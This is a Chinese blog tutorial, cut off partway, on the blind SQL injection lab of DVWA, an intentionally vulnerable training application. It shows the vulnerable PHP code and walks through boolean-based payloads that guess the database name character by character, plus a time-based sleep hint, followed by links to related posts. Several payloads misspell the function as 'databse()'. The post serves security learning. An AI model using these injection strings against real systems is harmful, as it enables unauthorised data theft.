DVWA V1.9:SQL Injection(SQL盲注)

最新推荐文章于 2024-04-08 14:44:20 发布
最新推荐文章于 2024-04-08 14:44:20 发布
阅读量299 收藏
点赞数
分类专栏: 靶场实战 文章标签: 安全 渗透 dvwa sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43233085/article/details/104089730
版权
本文详细介绍了DVWA中的SQL Injection漏洞,包括Low、Medium、High和Impossible四个级别,重点讨论了盲注攻击,如基于布尔的盲注和基于时间的盲注。通过核心代码分析和漏洞利用步骤,展示了如何通过一系列真假问题来窃取数据,以及如何应对各种防护措施。
摘要由CSDN通过智能技术生成

DVWA V1.9:SQL Injection(SQL盲注)

SQL Injection 介绍

当攻击者执行SQL注入攻击时,有时服务器响应来自数据库服务器的错误消息,抱怨SQL查询的语法不正确。
盲SQL注入与正常SQL注入是相同的,除了当攻击者试图开发应用程序时,而不是得到有用的错误消息时,它们会得到由开发人员指定的通用页。
这使得开发一个潜在的SQL注入攻击更加困难,但并非不可能。
攻击者仍然可以通过SQL语句询问一系列真假问题来窃取数据,并监视Web应用响应(有效条目重整或404头集)的方式

“时间为基础”的注入方法经常使用,当页面的响应如何不同(因此它是盲目攻击)时,没有可见的反馈。
这意味着攻击者将拭目以待页面响应回退需要多长时间。如果需要比正常时间长,他们的查询就成功了。
在这里插入图片描述
下面简要介绍手工盲注的步骤(可与之前的手工注入作比较):

1.	判断是否存在注入,注入是字符型还是数字型
2.	猜解当前数据库名
3.	猜解数据库中的表名
4.	猜解表中的字段名
5.	猜解数据

Low 级别

核心代码

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
   
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
   
        // Feedback for end user
        echo '<pre>User ID exists in the database.</pre>';
    }
    else {
   
        // User wasn't found, so the page wasn't!
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );

        // Feedback for end user
        echo '<pre>User ID is MISSING from the database.</pre>';
    }

    mysql_close();
}

?>

可以看到,Low级别的代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,同时SQL语句查询返回的结果只有两种,

User ID exists in the database.
与
User ID is MISSING from the database.

官方提示

SQL查询使用由攻击者直接控制的原始输入。
他们需要做的就是逃避查询,然后他们能够执行他们希望的任何SQL查询。

Spoiler: ?id=1' AND sleep 5&Submit=Submit.

漏洞利用

基于布尔的盲注

1.判断是否存在注入,注入是字符型还是数字型
输入1,显示相应用户存在:
在这里插入图片描述
输入1’ and 1=1 #,显示存在。
输入1’ and 1=2 #,显示不存在。
说明存在字符型的SQL盲注。

2.猜解当前数据库名
想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。

输入1’ and length(database())=1 #,显示不存在;
输入1’ and length(database())=2 #,显示不存在;
输入1’ and length(database())=3 #,显示不存在;
输入1’ and length(database())=4 #,显示存在:

说明数据库名长度为4。
下面采用二分法猜解数据库名。

输入1’ and ascii(substr(databse(),1,1))>97  #,显示存在,说明数据库名的第一个字符的ascii值大于97(小写字母a的ascii值);
输入1’ and ascii(substr(databse(),1,1))<122 #,显示存在,说明数据库名的第一个字符的ascii值小于122(小写字母z的ascii值);
输入1’ and ascii(substr(databse(),1,1))<109 #,显示存在,说明数据库名的第一个字符的ascii值小于109(小写字母m的ascii值);
输入1’ and ascii(substr(databse(),1,1))<103 #,显示存在,说明数据库名的第一个字符的ascii值小于103(小写字母g的ascii值);
输入1’ and ascii(substr(databse(),1,1))<100 #,显示不存在,说明数据库名的第一个字符的ascii值不小于100(小写字母d的ascii值);
输入1’ and ascii(substr(
最低0.47元/天 解锁文章
CNwanku
关注
专栏目录
DVWA——sql盲注
weixin_44743506的博客
08-23 2571
一、盲注sql注入区别: 盲注只回复是或否,Sql注入回复详细信息; 过程: 1、判断是否存在注入,注入时字符型还是数字型 2、猜解数据库的长度,猜解数据库的名称 3、猜解数据库中有几个表,猜解表的长度,猜解表的名称 4、猜解表中有几个字段、猜解字段长度,猜解字段名称 5、猜解数据 类型: 基于布尔型的盲注 基于时间的盲注 基于报错的盲注 二、思路 手工盲注,因为服...
DVWA V1.9:SQL InjectionSQL注入
qq_43233085的博客
01-26 583
DVWA V1.9:SQL InjectionSQL注入SQL Injection 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 SQL Injection 介绍 SQL注入攻击包括通过从客户端到应用程序的输入数据插入或“注入”SQL查询。 成功的SQL注入漏洞可以从数据库读取...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注LowMedium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWASQL Injection
baynk的博客
10-29 1712
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
Sql_injection
qq_49422880的博客
07-23 271
Bugku学生成绩查询 题目: 查询框也给出了提示,1,2,3,开始查询试试看,查询到4的时候就已没有信息显示,进行联合查询,使用union关键字。   1.查看有几个字段 ,到五的时候就在没有显示,说明只有五个字段。 1' order by 5 #   2.查看库名,有四个数据库,那我们要查的库肯定是skctf。 id=1' union select 1,1,1,group_concat(distinct table_schema) from information_schema.tables #
dvwaSQL盲注
ANDTM的博客
05-30 1079
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
DVWA程序源码v1.9稳定版:探索Web应用漏洞与安全实践》 DVWA(Damn Vulnerable Web Application)是一款专为安全研究和教育设计的开源Web应用程序。其核心目的是提供一个环境,使安全专业人员、开发人员以及对...
DVWA-1.9系列操作之Command Injection
fly小灰灰的专栏
01-22 1612
DVWA-1.9系列操作之Command InjectionDVWA-1.9系列一共分为10个功能模块: Brute Force(暴力破解) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA(不安全的验证码) SQL InjectionSQL注入SQL In
渗透测试学习2---DVWASQL Injection
正在学习的路上...
04-26 307
1.low PHP源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...
DVWASQL注入盲注
天空之蓝的博客
11-17 3392
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5760
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA------SQL Injection (Blind)(SQL盲注
m0_65712192的博客
12-09 2990
DVWA------SQL Injection (Blind)(SQL盲注
DVWAsql注入——盲注
Williamanddog的博客
12-22 3225
DVWA盲注
DVWA盲注详解
qq_45788625的博客
04-18 6781
low等级DVWA盲注详解
DVWA 盲注 high python代码注入
weixin_48083470的博客
05-29 319
DVWA 盲注 high python+burpsuite 高等级将输入和页面分离 使用burpsuite 分析页面工作原理 **代码很简单 没有使用二分查找 ** import requests url = "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" #url为显示页面的url keylist = [chr(i) for i in range(32, 127)] #包括数字、大小写字母、特殊字符 answer =
DVWA下的盲注<SQLmap工具注入>
weixin_34380948的博客
07-10 165
LOW难度!!!所需工具: DVWA环境、抓包工具、sqlmap抓包工具用fiddler为例。=====================================先进入DVWA调整模式为LOW打开抓包工具,确定可以抓到http流量包DVWA下选择SQL盲注,随意输入一个USER ID后回车会看到回显,用户ID存在复制该网页链接,保存到记事本,等下sqlmap用用抓包工具...
DVWA的使用4–SQL Injection(Blind)(SQL盲注
StoriesWine
03-27 2848
DVWA的使用4–SQL Injection(Blind)(SQL盲注SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。 1).low级别 源码: 对参数id没有做任何检查、过滤,存在...
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本)
weixin_45116657的博客
08-25 4995
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA】20. SQL Injection (Blind)SQL注入盲注(全等级Sqlmap版)
最新发布
Zichel77的博客
04-08 2165
盲注,有两种主要类型,包括布尔盲注和时间盲注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值